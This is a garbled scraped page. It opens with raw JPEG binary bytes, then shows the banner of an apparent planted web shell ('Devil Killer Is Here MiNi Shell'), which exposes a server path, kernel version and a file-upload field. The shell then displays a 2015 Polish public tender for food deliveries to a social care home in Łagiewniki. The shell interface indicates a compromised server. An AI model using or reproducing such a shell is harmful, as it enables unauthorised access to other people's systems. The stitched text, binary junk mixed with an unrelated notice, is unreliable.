JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151102/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151102/293286-N-2015.html

<p class="kh_header"><b>Chmielnik: Dostawa artykułów żywnościowych dla Domu Pomocy Społecznej w Łagiewnikach.</b><br>
<b>Numer ogłoszenia: 293286 - 2015; data zamieszczenia: 02.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Łagiewnikach , Łagiewniki 73, 26-020 Chmielnik, woj. świętokrzyskie, tel. 041 3542076, faks 041 3543050.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lagiewniki.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych dla Domu Pomocy Społecznej w Łagiewnikach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów żywnościowych dla Domu Pomocy Społecznej w Łagiewnikach gm. Chmielnik, pow. kielecki, woj. świętokrzyskie  
Zamawiający dopuszcza składanie ofert częściowych zgodnie z załączonymi formularzami asortymentowo - cenowymi.

1. Dostawa oznaczona jako Część I świeże warzywa będzie obejmować artykuły zgodnie z załącznikiem Nr 1a:
2.	Dostawa oznaczona jako Część II wyroby piekarskie będzie obejmować artykuły zgodnie z załącznikiem Nr 1b:
3.	Dostawa oznaczona jako Część III mrożone artykuły spożywcze będzie obejmować artykuły zgodnie z załącznikiem Nr 1c:
4.	Dostawa oznaczona jako Część IV jaja kurze świeże spożywcze będzie obejmować artykuły zgodnie z załącznikiem  Nr 1d: 
5.	Dostawa oznaczona jako Część V artykuły spożywcze sypkie, koncentraty, przyprawy i desery - załącznik nr 1e:
6.	Dostawa oznaczona jako Część VI   mięso świeże - załącznik nr 1f:  
Kod Wspólnego Słownika Zamówień (CPV): 15100000-9;
7.	Dostawa oznaczona jako Część VII   wędliny świeże i wędliny podrobowe świeże - załącznik nr 1g:  
8.	Dostawa oznaczona jako Część VIII  mleko, masło i sery  - załącznik nr 1h:
9.	Dostawa oznaczona jako Część IX  produkty mleczarskie - załącznik nr 1i:
10.	Dostawa oznaczona jako Część X  drób -  załącznik nr 1j: 
11.	Dostawa oznaczona jako Część XI owoce  -  załącznik nr 1k:
12.	Dostawa oznaczona jako Część XII   ziemniaki jadalne - załącznik nr 1l:

Wielkości zamówienia podane w Załącznikach od 1a do 1l do SIWZ - tzw. formularzach asortymentowo-cenowych są wielkościami orientacyjnymi, które będą korygowane w zależności od zapotrzebowania z zastrzeżeniem, iż dokonane zmiany nie spowodują zwiększenia wartości brutto zamówienia. Podana ilość towaru może być w trakcie wykonywania umowy zmniejszona lub zmieniona. W takiej sytuacji Wykonawca nie ma roszczenia o zakup przez Zamawiającego towaru, którego ilość Zamawiający ograniczył lub zmienił. Zakup towaru przez Zamawiającego w ilości mniejszej od ustalonej w siwz (dla każdego pakietu) nie stanowi nie wykonania lub nienależytego wykonania umowy. Wykonawca otrzyma jedynie zapłatę należną mu z tytułu faktycznie dostarczonego towaru. Dostawa nastąpi na koszt i ryzyko Wykonawcy. 

Dostawa będzie realizowana cyklicznie transportem Wykonawcy i na jego koszt do siedziby Zamawiającego wraz z wniesieniem do magazynów znajdujących się w miejscowości Łagiewniki Nr 73. 
Każdy z produktów ma być ( pod groźbą kar zapisanych w umowie) dostarczony  w wymaganych opakowaniach a waga jednostkowa artykułu/ów musi być zgodna  z wagą podaną w formularzu asortymentowo - cenowym.
Wykonawca nie może dostarczać produktów o gramaturze większej lub mniejszej niż ich gramatura określona przez Zamawiającego w formularzach asortymentowo - cenowych i przeliczać wartości dostarczonego towaru  o gramaturze innej niż określił to Zamawiający.
Środek transportu musi być przystosowany do przewożenia tego typu towaru zgodnie z obowiązującymi przepisami sanitarnymi.

Cykliczne dostawy  będą realizowane jak następuje: 
    - CZĘŚĆ I ŚWIEŻE WARZYWA  - w drugim dniu od złożenia zamówienia od
       poniedziałku do piątku w godzinach od  7:00 do   12:00.
       Artykuły mają być w I gatunku, bez uszkodzeń mechanicznych, czyste, świeże,
       o dobrym smaku. Dostawy warzyw w opakowaniach (workach) jednorazowych.
       Od  1 lipca dostawa warzyw młodych ( z nowych zbiorów).
Uwaga: waga artykułów w workach musi być zgodna z wagą podaną przez Zamawiającego w formularzu asortymentowo - cenowym, który stanowi załącznik 1a.

    - CZĘŚĆ II  WYROBY PIEKARSKIE - codziennie w drugim dniu od złożenia zamówienia od poniedziałku do  soboty w godz. od 7:00 do 9:00.
       Artykuły mają być świeże, o dobrym smaku.
   Uwaga: waga jednostkowa artykułów musi być zgodna z wagą podaną przez Zamawiającego w formularzu  asortymentowo - cenowym, który stanowi załącznik 1b.

 - CZĘŚĆ III  MROŻONE ARTYKUŁY SPOŻYWCZE - w  drugim dniu  od złożenia zamówienia od poniedziałku do piątku w godz. od 7:00 do 12:00.
Uwaga: waga jednostkowa artykułów musi być zgodna z wagą podaną przez Zamawiającego w formularzu asortymentowo - cenowym, który stanowi załącznik 1c.

- CZĘŚĆ IV JAJA KURZE ŚWIEŻE - w drugim dniu  od złożenia zamówienia od poniedziałku do piątku w godz. od 7:00 do 12:00.
       Jaja średnie (M) o wadze od 53g do 63 g
   
 - CZĘŚĆ V ARTYKUŁY SPOŻYWCZE SYPKIE, KONCENTRATY, PRZYPRAWY     I DESERY,  - w drugim  dniu od złożenia zamówienia od poniedziałku do piątku
        w godz. od 7:00 do 12:00.
      Artykuły mają być świeże, o dobrym smaku, z długim okresem przydatności
      do spożycia, w opakowaniach, które muszą posiadać nadrukowaną
      informację o nazwie środka spożywczego (skład), nazwie producenta, dacie
      przydatności do spożycia oraz wadze(zgodnie z obowiązującymi
       przepisami dotyczącymi wdrażania systemu HACCP).
Uwaga: waga jednostkowa artykułów musi być zgodna z wagą podaną przez Zamawiającego w formularzu asortymentowo - cenowym, który stanowi załącznik 1e.

    - CZĘŚĆ VI  MIĘSO ŚWIEŻE  - w drugim     dniu  od złożenia zamówienia od poniedziałku do piątku w godz. od 7:00 do  12:00.
       Artykuły mają być świeże, o dobrym smaku. Mięso  musi być hermetycznie pakowane ( mięso w workach przystosowanych do mrożenia)  i na każdym opakowaniu musi posiadać nadrukowaną informację o nazwie środka spożywczego, jego składzie, wartości odżywczej, dacie przydatności do spożycia oraz wadze.
Waga dostarczanego mięsa świeżego w opakowaniach musi być zgodna z wagą podaną przez Zamawiającego w formularzu asortymentowo - cenowym, który stanowi załącznik 1 f.

    - CZĘŚĆ VII   WĘDLINY ŚWIEŻE I WĘDLINY PODROBOWE ŚWIEŻE  -                   w drugim dniu  od złożenia zamówienia od poniedziałku do piątku w godz. od 7:00 do  12:00.
       Artykuły mają być świeże, o dobrym smaku. Wędliny i wędliny podrobowe  muszą być hermetycznie pakowane. Na każdym opakowaniu musi posiadać nadrukowaną informację o nazwie środka spożywczego, jego składzie, wartości odżywczej, dacie przydatności do spożycia oraz wadze.

Uwaga: Wykonawca , którego oferta zostanie wybrana jako najkorzystniejsza,  w dniu podpisania umowy, dostarczy w celu zapoznania się organoleptycznego ( w tym wykonanie dokumentacji fotograficznej) próbki wszystkich wędlin w kawałkach po ok. 20 dkg (pozostałość do zwrotu).
    
- Część VIII  MLEKO, MASŁO I SERY - codziennie od poniedziałku do soboty o godz.6:00 w drugim dniu od złożenia zamówienia.
Artykuły mają być świeże, o dobrym smaku, z długim okresem przydatności do  spożycia, w opakowaniach, które muszą posiadać nadrukowaną informację  o nazwie środka spożywczego, jego składzie, nazwie producenta, dacie przydatności do spożycia oraz wadze.
Uwaga: waga jednostkowa mleka musi być zgodna z wagą podaną przez Zamawiającego w formularzu asortymentowo - cenowym, który stanowi załącznik 1h.

- Część IX  PRODUKTY MLECZARSKIE -  w drugim dniu od złożenia zamówienia od poniedziałku do piątku od godz. 6:00 do godz.7:00
Artykuły mają być świeże, o dobrym smaku, z długim okresem przydatności do  spożycia, w opakowaniach, które muszą posiadać nadrukowaną informację  o nazwie środka spożywczego, jego składzie, nazwie producenta, dacie przydatności do spożycia oraz wadze.
Uwaga: waga jednostkowa produktów mleczarskich musi być zgodna z wagą podaną przez Zamawiającego w formularzu asortymentowo - cenowym, który stanowi załącznik 1i.

    - Część X  DRÓB - w drugim dniu  od złożenia zamówienia od poniedziałku do piątku w godz. od 7:00 do 12:00. Artykuły mają być świeże, o dobrym smaku.

    - Część XI  OWOCE - w drugim dniu  od złożenia zamówienia od poniedziałku do piątku w godz. od 7:00 do 12:00. Owoce w I gatunku.
Uwaga: waga jednostkowa owoców musi być zgodna z wagą podaną przez Zamawiającego w formularzu asortymentowo - cenowym, który stanowi załącznik 1k
   
 - Część XII  ZIEMNIAKI JADALNE - w drugim     dniu  od złożenia zamówienia 2 razy  w miesiącu  od poniedziałku do piątku w godz. od 7:00 do 12.00.
       Odmiany jadalne o barwie żółtej. Dostawy w opakowaniach (workach)
       jednorazowych do 15 kg. Od 1 lipca dostawy ziemniaków młodych ( z nowych
       zbiorów).
Uwaga: waga ziemniaków w workach musi być zgodna z wagą podaną przez Zamawiającego w formularzu asortymentowo - cenowym, który stanowi załącznik  1l.

Zamawiający powiadomi telefonicznie Wykonawcę, o każdej dostawie oraz wskaże zamawiane produkty z podaniem ich ilości.
Produkty muszą spełniać normy jakościowe oraz muszą być dostarczone w ich początkowym okresie gwarancji.

Wykonawca powinien zachować odpowiednie warunki  transportu i przechowywania dostarczanego towaru. Każda dostawa towaru wymagającego załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument. 

Wykonawca użyczy nieodpłatnie potrzebne pojemniki przy każdorazowej dostawie towaru do siedziby Zamawiającego na okres do następnej dostawy.
Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości towaru niż określona                      w ofercie.
Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z tytułu zmniejszenia zamówienia.
Dopuszcza się możliwość zamiany ilości poszczególnego asortymentu +/- 20%. 

Wykonawca ma obowiązek uznania reklamacji jakości i ilości oraz gramatury dostarczonego towaru  i dostarczenia nowej partii do siedziby  Zamawiającego w ciągu 2 godzin  w dniu złożenia reklamacji.
Do składania zamówień Zamawiający upoważni wybranego pracownika..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 03.22.21.11-4, 03.22.22.00-5, 03.22.10.00-6, 15.81.00.00-9, 15.33.11.70-9, 15.22.10.00-3, 03.14.25.00-3, 15.10.00.00-9, 15.50.00.00-3, 15.50.00.00-3, 15.10.00.00-7, 03.20.00.00-3, 03.21.21.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium dla części I do XII w wysokości ok. 3 % wartości zamówienia  tj. 15 965,00zł (słownie: piętnaście tysięcy dziewięćset sześćdziesiąt pięć 00/100 złotych) 
Na poszczególne części zamówienia : Część I świeże warzywa  980,00zł, Część II  wyroby piekarskie  1 190,00 zł, Część III  mrożone artykuły spożywcze 693,00 zł, Część IV jaja kurze świeże spożywcze 305,00 zł, Część V artykuły spożywcze sypkie, koncentraty, przyprawy i desery  3 174,00 zł, Część VI  mięso świeże  828,00 zł, Część VII  wędliny świeże i wędliny podrobowe świeże 3  028,00 zł, Część VIII mleko, masło i sery  3 197,00 zł, Część IX  produkty mleczarskie 699,00 zł, Część X drób 749,00 zł, Część XI owoce 795,00 zł, Część XII ziemniaki jadalne 345,00 zł. Wadium może być wnoszone w jednej lub kilku następujących formach określonych w art. 45 ust. 6 ustawy: pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
Wadium wniesione w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w Banku Spółdzielczym w Chmielniku nr 96 8483 0001 2001 0000 2519 0001 z dopiskiem:Dostawa artykułów żywnościowych dla Domu Pomocy Społecznej  w Łagiewnikach.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w  dokumentach i oświadczeniach wymaganych przez Zamawiającego i podanych w SIWZ dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia może ubiegać się Wykonawca, który:
- wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, co najmniej dwie dostawy artykułów żywnościowych do innych instytucji, o wartości minimum 50 000,00 zł każda - dotyczy części V ,VI i VII zamówienia - Załącznik Nr 5
- nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 ustawy.

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w  dokumentach i oświadczeniach wymaganych przez Zamawiającego i podanych w SIWZ dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w  dokumentach i oświadczeniach wymaganych przez Zamawiającego i podanych w SIWZ dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w  dokumentach i oświadczeniach wymaganych przez Zamawiającego i podanych w SIWZ dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w  dokumentach i oświadczeniach wymaganych przez Zamawiającego i podanych w SIWZ dołączonych do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Decyzja właściwej stacji Państwowej Inspekcji Sanitarnej o dopuszczeniu pojazdu (ów) do transportu żywności ( dot. samochodów, którymi żywność będzie dostarczana do DPS ) dot. dostaw artykułów ujętych załącznikach 1b, 1c, 1d, 1e, 1f, 1g, 1h, 1i, 1j. 


UWAGA. 	Rolnicy indywidualni winni przedstawić aktualny nakaz płatniczy podatku rolnego. W przypadku składania ofert przez Wykonawców występujących wspólnie w/w dokumenty muszą być złożone przez każdego Wykonawcę, 
dotyczy to również wspólników spółek cywilnych.

W przypadku wyboru oferty, Wykonawca przed podpisaniem umowy dostarczy Zamawiającemu zaświadczenie o wpisie do rejestru zakładów podlegających urzędowej kontroli organów Państwowej Inspekcji Sanitarnej jeżeli dostarczany produkt tego wymaga.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lagiewniki.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Łagiewnikach
Łagiewniki 73
26-020 chmielnik.</p>
